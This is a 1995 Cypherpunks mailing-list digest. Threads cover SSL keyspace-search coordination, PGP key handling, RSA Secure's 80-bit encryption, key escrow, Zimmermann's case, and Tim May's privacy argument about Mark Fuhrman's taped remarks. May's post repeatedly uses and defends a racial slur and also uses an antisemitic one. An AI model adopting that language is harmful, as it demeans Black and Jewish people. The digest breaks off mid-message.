From zeus at pinsight.com Fri Sep 1 00:11:55 1995 From: zeus at pinsight.com (J. Kent Hastings) Date: Fri, 1 Sep 95 00:11:55 PDT Subject: Karl Hess meeting - L.A. area Message-ID: <199509010711.AAA09927@utopia.pinsight.com> -- [ From: J. Kent Hastings * EMC.Ver #2.5.02 ] -- -----BEGIN PGP SIGNED MESSAGE----- "Extremism in the defense of liberty is no vice, and let me remind you, moderation in the pursuit of justice is no virtue." -- Aristotle, and a Goldwater speechwriter, but not Karl Hess. Politically Barry's Boy, Karl was often credited with Goldwater's most famous line, but he denied it when interviewed. Karl did write books: Dear America, Community Technology, and Capitalism For Kids. --- T H E K A R L H E S S C L U B --- now in its second year of almost monthly dinners, presents The Perestroika Deception: The Phony "Collapse" of Communism September's speaker is William (Bill) McIlhany, who will speak on Conspiracy Theory of the Soviet collapse, and may answer some questions about the Chemical Bank Takeover of Chase Manhattan, if we ask real nice. The Karl Hess Club will meet Monday, September 18 at the Marie Callendar Restaurant in Marina Del Rey 4356 Lincoln Boulevard (at the 90 Fwy). The program is free of charge, but if you care to dine, $13.00 covers everything including tax and tip, with the exception of alcoholic beverages. Cocktails at 7pm, Dinner at 7:30pm, Speaker at 8:30pm. Dinner: $13.00 includes all you can eat buffet with Marie's Pot Roast. Vegetable, Salad Bar, Potato, Cornbread, Apple, Lemon and Pumpkin Pies plus (Soft) beverages included. Order alcoholic beverages on your own, cash & carry. No reservations are necessary, but for more information, you are welcome to contact Mike Everling at (213) 225-3405. In order to get to the restaurant, take the Marina (90) Freeway West until it ends at Lincoln Boulevard. Turn right at Lincoln and right again into the parking lot of the restaurant- it's just at the corner. Inside the restaurant, go upstairs to the meeting room. The program for October 16 is still in development. The venue will again be Marie Callendar in MDR, with the tentatively scheduled speaker to be Dr. John Hospers. Want to make sure you are on the Karl Hess Club mailing list? Leave a message at (310) 289-4126, e-mail at agorist003 at aol.com, or write The Agorist Institute, 291 S. La Cienega Blvd., #749, Beverly Hills, CA 90211. Browse our Web page -- http://www.pinsight.com/~zeus/agorist/ For tax deduction, make donations payable to The Agorist Institute. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMEYh6zTxxI221vktAQFYDwP/chaMpCMb8kxpg2oo/AOi+ybiZFe5KQCY dJa8LKskqz6usBCuClhWfhvsyfwt5LOg3v9B8yRLiQR8kjHuUWNjkxY8WwsRUi3C NKGW33EeplPEg2Rpv/pxWYqNICfYQa6j9xAUVPSPZbJD9HrWM+sJ7uJGuLMY0p48 4u/vppPSyHU= =bvnM -----END PGP SIGNATURE----- From gjeffers at socketis.net Fri Sep 1 00:14:48 1995 From: gjeffers at socketis.net (Gary Jeffers) Date: Fri, 1 Sep 95 00:14:48 PDT Subject: FUHRMAN key escrow Message-ID: <199509011002.FAA28046@mail.socketis.net> FUHRMAN key escrow Fuhrman seems to be a Godsend to us. He is helping to destroy the public's perceived legitimacy of state authority. If things keep moving the way they are, Fuhrman may join the names: John Crapper, Quisling, & Hooker. In which case, I propose the term, Fuhrman key escrow, to substitue for the term, mandatory state key escrow.  From gjeffers at socketis.net Fri Sep 1 00:17:18 1995 From: gjeffers at socketis.net (Gary Jeffers) Date: Fri, 1 Sep 95 00:17:18 PDT Subject: Phil Zimmermann/Amnesty International? Message-ID: <199509011005.FAA28054@mail.socketis.net> Phil Zimmermann/Amnesty International? I was wondering if the Zimmermann case would be a proper concern of Amnesty International. Phil is obviously a political dissident. His persecution is obviously political. If Phil got support from Amnesty Int'l, then his persecution could be a big embarrassment to the Federal gov't. He has a lot of supporters and taking up his cause could be a big promotional for Amnesty International. The Feds might feel forced to drop the matter early. Any ideas? Gary Jeffers  From rsalz at osf.org Fri Sep 1 04:09:58 1995 From: rsalz at osf.org (Rich Salz) Date: Fri, 1 Sep 95 04:09:58 PDT Subject: sums with BIG numbers Message-ID: <9509011109.AA15900@sulphur.osf.org> >Volume 4 should be in print shortly. All of Volume 4 or the first couple-hundred pages as a fascile? Or have those plans change? From sinclai at ecf.toronto.edu Fri Sep 1 04:39:57 1995 From: sinclai at ecf.toronto.edu (SINCLAIR DOUGLAS N) Date: Fri, 1 Sep 95 04:39:57 PDT Subject: opinions on RSA Secure? In-Reply-To: Message-ID: <95Sep1.073743edt.1421@cannon.ecf.toronto.edu> > I am a user of SecureDrive, and strongly support it. There is *no* > interface required, once you log into the drive, *everything* operates > totally transparent to the user. I used to use it too. Sure, once you've got it set up and automated, it's transparent. But can you see J. Random User installing it? > Always keep in mind that when the gov't doesn't mind the software being > exported, they alrady know how to compromise it...Trust PGP, Hpack & > SecureDrive...you won't be disappointed. When last I looked, your government didn't allow the export of 80-bit cryptosystems. There is no argument that the 40-bit export version is breakable. From droelke at rdxsunhost.aud.alcatel.com Fri Sep 1 05:27:47 1995 From: droelke at rdxsunhost.aud.alcatel.com (Daniel R. Oelke) Date: Fri, 1 Sep 95 05:27:47 PDT Subject: SSL search attack Message-ID: <9509011225.AA20540@spirit.aud.alcatel.com> > > I see nothing wrong with the concept of being allocated an initial chunk > and having the scan software attempt to ACK it when 50% of it has been > searched. A successful ACK would allow the releasing of a new chunk (in > response) equal in size to the returned chunk. A failure of the Server to > accept the ACK would trigger a retry at set intervals (such as 75% and 100% > or 60/70/80/90/100%) until the Server responds. Thus the scanner is always > in possession of a Full Sized Chuck to scan (so long as the Server accepts > an ACK before the 100% done mark) and temporary failures will not stop the > process of a scanner as currently happens. > The only way this can work is if the server is told it is a 50%/75%/etc size ACK, and then latter the server is ACKed for the full 100%. Why? Because what happens if the client dies immediately after doing the ACK - maybe only 51% of that space has been searched, yet the server has already seen an ACK for it. IMO - a % ACK is to much complexity and extra work on the server, which is already having trouble keeping up. Dan ------------------------------------------------------------------ Dan Oelke Alcatel Network Systems droelke at aud.alcatel.com Richardson, TX From don at cs.byu.edu Fri Sep 1 06:00:13 1995 From: don at cs.byu.edu (don at cs.byu.edu) Date: Fri, 1 Sep 95 06:00:13 PDT Subject: Web of Trust Message-ID: <199509011201.GAA01376@wero> -----BEGIN PGP SIGNED MESSAGE----- I am current sorting through the PGP keyserver keyfile to extract a limited web of trust. I believe that current servers would be best to limit their keys in a similar fashon. Since we can't all have what we want without coding it ourselves, I'm doing the next best crappy imitation. Anyways, I am trying to find keys that are actually relevant and inter-connected with signatures. Naturally, it won't be anywhere near complete or extensive, and will be a dog to update, but 5 meg keyfiles take a long time to search... I am requesting that all "active" cypherpunks/cyphergroupies please send me their key number, IF it's already on the keyservers. If it's recently put there, be sure to tell me or I will be annoyed. If it's not there at all, I'll be annoyed. Personally annoyed, not I-ran-some-scriptfile annoyed. If you searched any of the RC4 or SSL keyspace, for example, I'm interested. If you post messages occasionally, [conspiracypunks need not apply] I'm interested. If you generated a key because your neighbor taught you how, don't bother. If anyone wants the keynumbers/script/entirekeyfile I could put it on ftp or something. Naturally, I'll be forwarding all results to the NSA quantum crack-o-matic. Have a nice day. :) Don -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQB1AwUBMEb1A8La+QKZS485AQGMKwL/Qzf67QSnn3iLZ7gCumfPcC/KqSyYSM0s OknMHhGDLb74qSWBDRyM6pPdwIHOg+Pjpl53ruMSu9YhXQrjMHgZZUjFh6c7vhi2 c+j3BYQ87us0BRuoj9pu8/d89gG3vsv3 =3qRz -----END PGP SIGNATURE----- fRee cRyPTo! jOin the hUnt or BE tHe PrEY PGP key - http://bert.cs.byu.edu/~don or PubKey servers (0x994b8f39) June 7&14, 1995: 1st amendment repealed. Death threats ALWAYS pgp signed * This user insured by the Smith, Wesson, & Zimmermann insurance company * From rkw at dataplex.net Fri Sep 1 06:13:28 1995 From: rkw at dataplex.net (Richard Wackerbarth) Date: Fri, 1 Sep 95 06:13:28 PDT Subject: SSL search attack Message-ID: At 7:25 AM 9/1/95, Daniel R. Oelke wrote: >> >> I see nothing wrong with the concept of being allocated an initial chunk >> and having the scan software attempt to ACK it when 50% of it has been >> searched. A successful ACK would allow the releasing of a new chunk (in >> response) equal in size to the returned chunk. A failure of the Server to >> accept the ACK would trigger a retry at set intervals (such as 75% and 100% >> or 60/70/80/90/100%) until the Server responds. Thus the scanner is always >> in possession of a Full Sized Chuck to scan (so long as the Server accepts >> an ACK before the 100% done mark) and temporary failures will not stop the >> process of a scanner as currently happens. >> > >The only way this can work is if the server is told it is a 50%/75%/etc >size ACK, and then latter the server is ACKed for the full 100%. > >Why? Because what happens if the client dies immediately after doing >the ACK - maybe only 51% of that space has been searched, yet >the server has already seen an ACK for it. You NEVER claim to have searched space until you have actually done so. >IMO - a % ACK is to much complexity and extra work on the server, >which is already having trouble keeping up. No. The claim is that the server has no problem keeping up with acks. Besides, if it does, we simply insert a layer of "managers" to buffer the top management from being "bothered" too often. You are making the "ACK" too complicated. Assuming that you are multi-threaded--- Simply run two "workers" on the same machine. If there are delays in getting keys assigned, the two will soon get out of phase and keep the cpu busy. ---- Richard Wackerbarth rkw at dataplex.net From droelke at rdxsunhost.aud.alcatel.com Fri Sep 1 06:27:10 1995 From: droelke at rdxsunhost.aud.alcatel.com (Daniel R. Oelke) Date: Fri, 1 Sep 95 06:27:10 PDT Subject: SSL search attack Message-ID: <9509011325.AA20856@spirit.aud.alcatel.com> > > At 7:25 AM 9/1/95, Daniel R. Oelke wrote: > >> > >> I see nothing wrong with the concept of being allocated an initial chunk > >> and having the scan software attempt to ACK it when 50% of it has been > >> searched. A successful ACK would allow the releasing of a new chunk (in > >> response) equal in size to the returned chunk. A failure of the Server to > >> accept the ACK would trigger a retry at set intervals (such as 75% and 100% > >> or 60/70/80/90/100%) until the Server responds. Thus the scanner is always > >> in possession of a Full Sized Chuck to scan (so long as the Server accepts > >> an ACK before the 100% done mark) and temporary failures will not stop the > >> process of a scanner as currently happens. > >> > > > >The only way this can work is if the server is told it is a 50%/75%/etc > >size ACK, and then latter the server is ACKed for the full 100%. > > > >Why? Because what happens if the client dies immediately after doing > >the ACK - maybe only 51% of that space has been searched, yet > >the server has already seen an ACK for it. > > You NEVER claim to have searched space until you have actually done so. That is exactly what I was arguing against - but the first sentance of what I quoted was saying was ok. > Assuming that you are multi-threaded--- Simply run two "workers" on the > same machine. If there are delays in getting keys assigned, the two will > soon get out of phase and keep the cpu busy. > I kind of like that idea... Dan ------------------------------------------------------------------ Dan Oelke Alcatel Network Systems droelke at aud.alcatel.com Richardson, TX From rrothenb at ic.sunysb.edu Fri Sep 1 07:12:13 1995 From: rrothenb at ic.sunysb.edu (Deranged Mutant) Date: Fri, 1 Sep 95 07:12:13 PDT Subject: Phil Zimmermann/Amnesty International? In-Reply-To: <199509011005.FAA28054@mail.socketis.net> Message-ID: <199509011410.KAA20234@libws1.ic.sunysb.edu> > > I was wondering if the Zimmermann case would be a proper concern of > Amnesty International. Phil is obviously a political dissident. His > persecution is obviously political. If Phil got support from Amnesty > Int'l, then his persecution could be a big embarrassment to the Federal > gov't. He has a lot of supporters and taking up his cause could be a > big promotional for Amnesty International. The Feds might feel forced > to drop the matter early. Any ideas? > I've heard that A.I. does not discuss political persecution as much in the countries that are doing it, since they do not want to offend the powers-that-be in that country, though they will note a case in another country. (In other words, if A.I. did note the PRZ case they'd only discuss it outside the United States.) This is just speculation though... From rrothenb at ic.sunysb.edu Fri Sep 1 07:12:28 1995 From: rrothenb at ic.sunysb.edu (Deranged Mutant) Date: Fri, 1 Sep 95 07:12:28 PDT Subject: FUHRMAN key escrow In-Reply-To: <199509011002.FAA28046@mail.socketis.net> Message-ID: <199509011412.KAA20264@libws1.ic.sunysb.edu> > FUHRMAN key escrow > > Fuhrman seems to be a Godsend to us. He is helping to destroy the > public's perceived legitimacy of state authority. If things keep moving > the way they are, Fuhrman may join the names: John Crapper, Quisling, > & Hooker. In which case, I propose the term, Fuhrman key escrow, to > substitue for the term, mandatory state key escrow. I think that the revelations of police corruption in Philadelphia (where police have admitted to setting-up hundreds of people) may have more effect that Fuhrman... From asgaard at sos.sll.se Fri Sep 1 07:29:05 1995 From: asgaard at sos.sll.se (Mats Bergstrom) Date: Fri, 1 Sep 95 07:29:05 PDT Subject: FUHRMAN key escrow In-Reply-To: <199509011002.FAA28046@mail.socketis.net> Message-ID: Gary Jeffers wrote: > Fuhrman seems to be a Godsend to us. He is helping to destroy the > public's perceived legitimacy of state authority. If things keep moving > the way they are, Fuhrman may join the names: John Crapper, Quisling, > & Hooker. In which case, I propose the term, Fuhrman key escrow, to > substitue for the term, mandatory state key escrow. The issue is apparently also teaching the US public to use CODE: 'I don't give a f-wording s-word how many times this c-word-sucker said the n-word as long as the DNA-tests say that the other son-of-a-b-word did it.' Mats From warlord at MIT.EDU Fri Sep 1 07:52:59 1995 From: warlord at MIT.EDU (Derek Atkins) Date: Fri, 1 Sep 95 07:52:59 PDT Subject: O.J. ObCrypto: Fuhrman's Folly Fans Fakery Fears... In-Reply-To: Message-ID: <9509011452.AA15088@l-slide.MIT.EDU> > I do not think that PGP 2.x can easily (ie: Automatically) use one key for > Signing and another for Encrypting a Message (it does both at the same time > if you ask). If I "Clear Sign" a message and then Encrypt it, then I get > the result but I'm not sure if doing the decrypt on such a message will > automatically spot the signature and verify it (as would occur with a E+S > pass). Sure it can, and I know people who do. Here is what you do: 1) Generate two keys. First generate your encryption key, then generate your signature key. This way, your signature key will be placed first in your secret keyring, and it will be used by default. Alternatively, you could use two (slightly) different userIDs on the keys and put something in your config.txt 2) Extract the keys in reverse order into a single keyfile and then distribute that keyfile to people. This way, when it gets added to other people's keyrings, the encryption key will be placed first, and that will be used by default. 3) Proceed to use PGP normally. When you sign a message, it will find the signature key first and use that. When someone wants to encrypt to you, they will find the encryption key first. When verifying the signature or trying to decrypt the message, it uses the keyID to determine which key was used, so order does not matter. The only problem is that if someone re-orders their keyring then this will no longer work. E.g., if the keys are added in the wrong order. -derek From Piete.Brooks at cl.cam.ac.uk Fri Sep 1 08:50:47 1995 From: Piete.Brooks at cl.cam.ac.uk (Piete Brooks) Date: Fri, 1 Sep 95 08:50:47 PDT Subject: SSL search attack In-Reply-To: <9509011325.AA20856@spirit.aud.alcatel.com> Message-ID: <"swan.cl.cam.:275380:950901154847"@cl.cam.ac.uk> >>>> I see nothing wrong with the concept of being allocated an initial chunk >>>> and having the scan software attempt to ACK it when 50% of it has been >>>> searched. A successful ACK would allow the releasing of a new chunk (in >> You NEVER claim to have searched space until you have actually done so. > That is exactly what I was arguing against - but the first sentance of what > I quoted was saying was ok. No -- If you ask for 2 segments, then when you are 50% done, it is OK to ACK the *FIRST* segment. >> Assuming that you are multi-threaded--- Simply run two "workers" on the >> same machine. If there are delays in getting keys assigned, the two will >> soon get out of phase and keep the cpu busy. > I kind of like that idea... I thought of that, but: 1) for the same server load, it doubles the number of unACKed segments 2) if process A is lagging process B, then when process B finishes and is idle waiting for the server, process A will run faster and thus reduce the lag. This will make the processes drift into phase. I'm not convinced one way or the other. From lwp at mail.msen.com Fri Sep 1 09:15:52 1995 From: lwp at mail.msen.com (Lou Poppler) Date: Fri, 1 Sep 95 09:15:52 PDT Subject: SSL search attack In-Reply-To: Message-ID: On Fri, 1 Sep 1995, Robert A. Rosenberg wrote: > I see nothing wrong with the concept of being allocated an initial chunk > and having the scan software attempt to ACK it when 50% of it has been > searched. A successful ACK would allow the releasing of a new chunk (in > response) equal in size to the returned chunk. A failure of the Server to The ACK process and the allocation process are separate, and should remain so. They run on different servers, and they run as separate processes in the unix version of brloop. A little tweaking of brloop could allow pre-fetching of the next segment to search, without any effect on the ACK process. I dislike the idea of a client sending an ACK before it has searched the entire segment. :::::::::::::::::::::::::::::::::::::: :: Lou Poppler :: No animals were harmed in the :: http://www.msen.com/~lwp/ :: production of this message. :::::::::::::::::::::::::::::::::::::: From m5 at dev.tivoli.com Fri Sep 1 09:49:10 1995 From: m5 at dev.tivoli.com (Mike McNally) Date: Fri, 1 Sep 95 09:49:10 PDT Subject: SSL search attack In-Reply-To: <9509011325.AA20856@spirit.aud.alcatel.com> Message-ID: <9509011648.AA07795@alpha> > > > ACK ACK > > ACK > > > ACK > ACK I've just kinda been watching this debate for a while, so I may well have missed some of the more interesting details; if so, I apologize for my noise in advance. I work on a lot of commercial software under constraints of scalability much like the SSL "attack server" being discussed here. My instincts tell me that in this situation the whole process would be *much* simpler if the basic idea of keeping the central server (or the family of distributed servers in those models) completely "informed" by all the attacking clients were abandoned. Tim May's "random attack" idea was extremely attractive, I thought. However, I think that it'd be possible to take advantage of the fact that the keyspace itself is basically constant (until the keysize is increased in the protocol under attack, of course). I mean, 40 bits is 40 bits. Similarly, the capacity of most clients will be fairly consistent. (I have access (in theory, of course; don't mention this to my management) (hi todd) to a hundred or so CPU's here, and that doesn't really change too often.) Rather than apportion the search space out dynamically on each attack, why not simply allow attack clients to "subscribe" on a semi-permanent basis? All the server would have to do is make batches of ciphertext available for cracking. When a request comes in from a subscriber for a copy of some ciphertext, the server knows (or at least can legitimately suspect) that that subscriber's already-known keyspace will be searched. As far as getting acknowledgements of search completion, again the server can by inference assume that (based on the prior establishment of client capabilities) after a pre-determined period of time the key sub-space will have been searched. It might be appropriate for clients to send back NACK messages, in case for example somebody shuts down the client's network unexpectedly. Assuming this goes pretty smoothly one would hope that the number of failures would be considerably smaller than the number of successs. Again, ignore me if I'm blind to something obvious. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | Nobody's going to listen to you if you just | Mike McNally (m5 at tivoli.com) | | stand there and flap your arms like a fish. | Tivoli Systems, Austin TX | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From sjb at austin.ibm.com Fri Sep 1 09:57:15 1995 From: sjb at austin.ibm.com (Scott Brickner) Date: Fri, 1 Sep 95 09:57:15 PDT Subject: SSL search attack In-Reply-To: <9509011225.AA20540@spirit.aud.alcatel.com> Message-ID: <9509011655.AA11645@ozymandias.austin.ibm.com> Daniel R. Oelke writes >The only way this can work is if the server is told it is a 50%/75%/etc >size ACK, and then latter the server is ACKed for the full 100%. > >Why? Because what happens if the client dies immediately after doing >the ACK - maybe only 51% of that space has been searched, yet >the server has already seen an ACK for it. > >IMO - a % ACK is to much complexity and extra work on the server, >which is already having trouble keeping up. I agree. ACKing partial segments is a bad idea. But, when a client is given a block of segments, partial ACKing can let poorly connected clients communicate with the server via e-mail, and still stay busy. When the client completely finishes half of its segments, it ACKs them and asks for that many more segments. The fraction can be adjusted as mean communications latency to the server is measured. Ideally the new segments arrive just as the client finishes the second half of its original segments. This way the segments are allocated as late as possible, letting better connected clients have a better shot at them. From stewarts at ix.netcom.com Fri Sep 1 10:12:06 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Fri, 1 Sep 95 10:12:06 PDT Subject: opinions on RSA Secure? Message-ID: <199509011708.KAA11239@ix8.ix.netcom.com> >> The fact that the key is only 80 is *major* compromise. I would >> recommend that package to no-one. With only a 80 bit key you dont >> *need* trapdoors, granted they may be more "convenient" but the fact is >> the 80 key *can* [and certainly will] be broken... 80 is an interesting number. Clipper-sized :-) It's much less than 128, which seems to be popular for other software and works well with MD5-based random session key generators. It's also interestingly bigger than 64, which the Feds are trying to tell us is good enough for non-government work. Are RSA giving in to the Feds? Or are they trying to up the bid, at least allowing us something as good as Clipper if we can't get 128? Not my poker game. Let's look at some threat models. It's probably more than strong enough for any data you're willing to keep on a machine running MS-DOS, where serious attackers will go around it; it's about right for random "left your laptop in the airport" security, and for business use, if the police are going to confiscate your machine, they can probably subpoena the keys from somebody in your company anyway. Random hackers aren't going to be able to crack it, unlike 40-48 or maybe 56. It's big enough that the NSA probably can't break it right now, but in 10-20 years of computer speed growth they'll be able to if they want. It's probably fine for dealing with amounts less than $1-100M for maybe 10 years, and for misdemeanors and light felonies if you're not using the key escrow :-) And in 5 years, you'll be using a different operating system (even if it _is_ named "Windows"), so you'll need a new version, and you can re-encrypt your data when you move it to a decent-sized disk instead of that wimpy 9GB mechanical drive. Anybody who's got a 5-year-old dump of your system has probably stolen any secrets you care about long since anyway. #--- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From stewarts at ix.netcom.com Fri Sep 1 10:12:16 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Fri, 1 Sep 95 10:12:16 PDT Subject: A problem with anonymity Message-ID: <199509011708.KAA11228@ix8.ix.netcom.com> Scott Brickner's example has fairly close analogies today. Corporations, cash, and assets with variable value are already useful. Alice is the dying parent who runs a business or has a good credit-rating. Bob is the irresponsible kid, Carol is the about-to-be unlucky creditor. Alice borrows lots of money from Carol, tells Bob that it's in the mattress / numbered Swiss Bank Account / collection of $$$$ artwork at home. Alice dies, and Bob absconds with the money (probate isn't needed for Swiss bank accounts or unrecorded stuff in mattresses) or sells the paintings to the highest bidder of Dave, Eve, and Freddie (with a bribe to all of them, and a kickback from Dave when he finally sells the painting for its real value.) (Or maybe it's not bribery and kickbacks, he's just a major shareholder in the Glorkspitz corporation, which is a major shareholder in their businesses.) Carol is stuck trying to get money out of The Alice Estate, which turns out to be surprisingly broke. If she lent the money to The Alice Company (which looks more creditworthy than Chronologically Challenged Widow Alice), Alice would have had to leave Bob the yellow-sticky with the store safe combination instead of leaving the cash in her mattress. Now, one reason we have probate courts is to try to stop this sort of fraud, making sure creditors get paid and heirs get their shares. Another reason, of course, is to make sure "Uncle" Sammy gets to inherit part of it, even though he's not a relative. (That's of course one of the reasons for having Swiss bank accounts you didn't remember to mention on your tax forms, fireproof mattresses, foreign corporations, and friends in the art dealer business :-) Does good anonymity make this easier? Sure. And if all the heirs are cooperative, they can conspire to rip off their parents' creditors, if they're dishonest, or at least to avoid taxes, if they're not tax-believers. Of course, if they're dishonest, they'll have plenty of opportunities without having anybody die, and that'll probably affect bankruptcy law and increase Federal self-justification for watching the money supply long before anonymous estate ripoffs become common. #--- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From m5 at dev.tivoli.com Fri Sep 1 10:22:29 1995 From: m5 at dev.tivoli.com (Mike McNally) Date: Fri, 1 Sep 95 10:22:29 PDT Subject: SSL search attack In-Reply-To: <9509011648.AA07795@alpha> Message-ID: <9509011721.AA07870@alpha> Scott Brickner writes: > I think your assumption that available CPU is approximately constant > is incorrect. Different participants have different constraints... Hmm. I suppose that's probably true for some more than others. Again, hmm. > Also, the "subscription" process is somewhat discouraging to those > who participate for the prize. Ah. That looks like one of those little details that got by me. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | Nobody's going to listen to you if you just | Mike McNally (m5 at tivoli.com) | | stand there and flap your arms like a fish. | Tivoli Systems, Austin TX | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From rudy at bnr.ca Fri Sep 1 10:32:48 1995 From: rudy at bnr.ca (rudy (r.) rawlins) Date: Fri, 1 Sep 95 10:32:48 PDT Subject: Phil Zimmermann/Amnesty International? Message-ID: <"8983 Fri Sep 1 11:17:28 1995"@bnr.ca> In message "Phil Zimmermann/Amnesty International?", rrothenb at ic.sunysb.edu writes: > > > > I was wondering if the Zimmermann case would be a proper concern of > > Amnesty International. [snip] > > > I've heard that A.I. does not discuss political persecution as much in > the countries that are doing it, since they do not want to offend the > powers-that-be in that country, though they will note a case in another > country. (In other words, if A.I. did note the PRZ case they'd only > discuss it outside the United States.) > > This is just speculation though... > You're right on the speculation; A.I. has no such policy. As a matter of fact, they will meet face to face with government officials to seek the release of 'prisoners of conscious' - which is a possible category for Phil Z. Though Phil, despite what we may think, is not a prisoner, yet.. From tcmay at got.net Fri Sep 1 11:13:21 1995 From: tcmay at got.net (Timothy C. May) Date: Fri, 1 Sep 95 11:13:21 PDT Subject: Fuhrman needed a digital pseudonym! Message-ID: Before you folks jump on the "racist" Mark Fuhrman, think about the "surveillance state" issues. While it was not any government organization that taped Fuhrman's comments, there are some real issues involved in how deeply and how far back we want to "mine" comments made by people. Some real issues of privacy. The Mark Fuhrmans of the future may be interested in using technologies to protect their privacy, to give them "plausible deniability" should their recorded words come back to haunt them. Brief comments: * This post is primarily about the role of pseudonyms, not the OJ trial or the testimony/tapes involving Mark Fuhrman. * And the issue of "mining" of ancient records, especially as technology makes the recording of sounds, the taping of sights, and the archiving of electronic messages so much easier. * Those who think this is off-topic because it has nothing to do with coding in C are hereby invited to hit the "D" key, or whatever passes for it, right now. Caveat: I've watched entirely too much of the OJ trial on CNN, as I sit here at home and surf the Net every morning. It's easy to have the television on, and the OJ trial has had many interesting twists. When the stuff gets boring, I switch to music or perhaps to the financial network CNBC. So, I've see nearly everything being talked about here. Opinion on OJ: ***elided by Tim to head off debates about OJ's guilt or innoncence***. (I state this to show my prejudices, not to start an "OJ debate" on this list. Actually, I just elided (deleted) the opinion I had expressed, so as not to inflame anyone here.) What really bothers me, as it relates to the pro-privacy themes of this list, is the reaching back many years to comments made by a witness--Mark Fuhrman--to a screenplay writer. Because she kept audiotapes, going back 10 years, these comments may likely strongly influence the verdict in this "trial of the century." Anyone in favor of heading off the "surveillance society" should be alarmed at this development. As tape recorders and video cameras proliferate, comments may be compiled, taken out of context, and used as evidence. (Who amongst us has not said "nigger"? Does it count if I am asking why the rap group "Niggas with Attitude" chooses to label themselves as niggers? I figure that if blacks routinely call themselves niggers and call folks like me "honkies," then it's fair to call _them_ niggers. Not that I do this, but I don't see the term as so horrifying as to cause a killer like OJ to get off as this spectacle unfolds. Besides, it's become "permissable" for black leaders to refer to New York City as "Hymietown" in a way that would result in public stoning for a white to refer to a city as "Niggertown." The old double standard.) The point: Fuhrman should have used a pseudonym, should have taken steps to protect his identity. Of course, in 1985 this would have been harder. But have people given up the right to speak "for themselves" in private? If there is no solid evidence that Fuhrman actually committed any crimes, but only appeared to be puffing himself up, a la a Wambaugh wannabee, then why are his "racist" and "sexist" comments deemed so important as to have derailed the trial for the last couple of weeks? I have said an awful lot of inflammatory things at Cypherpunks meetings, at parties, in political discussions, and so forth. I don't claim that there should be a law against people bringing these issues up, or even a law against tape-recording various kinds of meetings. I just argue that we are devolving into a surveillanc To be sure, there are valid trial issues: -- Did he misspeak, misremember, or lie when he said he had "never" used the word "nigger" in the past 10 years? (I recall at the time, circa Feb-March, thinking to myself "Oh, sure!," when he said he had not used the word nigger in the past 10 years.) -- If this is perjury, how does it affect other evidence? (I'm not a lawyer, but I grok from the comments on CNN that this has to do with whether his testimony was supportive of other evidence, "cumulative," and related issues.) -- Does this possible misspeaking, misremembering, or lying have anything to do with whether he planted the bloody glove? -- etc. There are various valid issues. Spending a few weeks on these issues is another matter, though, IMHO. In my view, if I were the judge I'd have forced this issue to be resolved in hours, not weeks. Anyway, I am greatly disturbed by this "mining" of ancient comments, made to a screenwriter. Whether Fuhrman is a "racist" or not, this witch trial is a diversion from the real issues. And some real privacy issues are raised. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From mr.xxx at ce.flashnet.it Fri Sep 1 12:00:27 1995 From: mr.xxx at ce.flashnet.it (Pasquale Piombino) Date: Fri, 1 Sep 95 12:00:27 PDT Subject: No Subject Message-ID: <199509011900.VAA01399@ns.ce.flashnet.it> Hi all, I am searching PGP software. Does anyone know where I can download it? Thanks for answers. -+-+------------------->->--------------------------------:-Q------------ � Pasquale Piombino | | Via Colombo, 35 Email: mr.xxx at ce.flashnet.it � � I-81100 CASERTA Phone - Fax: 0039 823 329152 | | ITALY � +-+-------------8-)---------------------:-))-----------------:-o--------- From stewarts at ix.netcom.com Fri Sep 1 12:15:26 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Fri, 1 Sep 95 12:15:26 PDT Subject: Some details on RSA Secure Message-ID: <199509011912.MAA29501@ix8.ix.netcom.com> At 08:48 AM 8/31/95 PST, "baldwin" wrote: >Here are my biased comments on RSA Secure. They are biased by >the fact that I an a techie who works for RSA Data Security. >Neatest Features: >- It is integrated with the File Manager on Windows and the > Finder on Mac System 7. It's an interesting approach - simpler than installing as a file system (I'm not using SecDrv because it needs a separate partition), but so far it seems relatively useable. On the other hand, since there are file types it refuses to encrypt, like DLLs, there are some things it can't protect (like DLLs with passwords embedded in them.) >- A settable list of files can be automatically decrypted (or > encrypted) on system startup (or shutdown). I've got mixed feelings about this - since my password has normally timed out by the time I shut down, it demands a password before shutting down, and if I had any large amount of data there, I assume it would take a while to reencrypt on my 386-box. (Laptops are generally slower than similar-age desktops, and you often want to shut them down quickly, even when they aren't shutting themselves down to save power.) I haven't tried powering it off during this process, but I assume that at best the files would be unencrypted and at worst there'd be one half-decrypted and sitting in limbo to be trashed the next time the system starts up? >Technical Features: >- The user's passphrase unlocks a master key that is used to unlock > the file encryption key for each file. Since the documentation mentions 512-bit and 1024-bit RSA keys, I'd guess that each file has a separate random RC4 key which is stored in the file header, encrypted with the user and escrow RSA keys plus the MD5 hash, plus the encrypted real filename? (The alternative would be that the userpref.!!! file contains an RC4 key encrypted with RSA, which is used to encrypt the file keys, but that would lead to much shorter headers, and cracking that master RC4 key would then allow cracking of all documents on the system, so I'm guessing that's not the approach used.) >Request for Improvements: 1) The "Emergency" menu item in the File Manager is annoying. Could it be combined with the RSA menu item, eliminated, or at least have 